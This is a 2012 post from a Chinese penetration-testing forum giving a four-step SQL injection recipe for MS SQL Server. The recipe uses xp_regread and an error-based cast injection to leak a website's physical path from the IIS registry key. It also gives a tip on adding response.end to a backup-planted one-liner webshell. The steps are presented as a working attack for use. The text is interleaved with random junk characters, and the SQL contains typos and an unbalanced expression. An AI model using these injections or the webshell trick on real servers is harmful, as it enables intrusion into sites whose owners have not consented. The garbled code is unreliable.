找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 DB权限暴出网站物理路径代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1898|回复: 0
打印 上一主题 下一主题

DB权限暴出网站物理路径代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:23:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表/ h: ]4 Q( c: H4 j& g: E

: n4 U+ ]8 J, _1 {& x  @$ P; v  p
# E' t- j- Y! G+ U# \  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中6 Y3 u" j3 W9 ?/ ^% x7 Z# j3 |1 k+ ?

3 r" a! S- g6 y5 r1 n% i4 D/ t, Q9 k5 @0 M- \+ w. Z- F
  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
6 m9 u9 Q5 }3 I/ J; I, X$ g$ P  l1 A. t# p" {
  f) }7 @  k/ c8 A
  4、drop table [jm_tmp]-- 删除此表。9 h% O' e$ n' M) ]# D" H
% A* `  S+ F" m' p+ c4 f9 [

' n, l  @' _% t5 W$ m: X另附上备分专用一句话5 W9 ]. W" |4 C4 R
  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.8 x/ E2 f7 w( z4 C- W" `' y
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表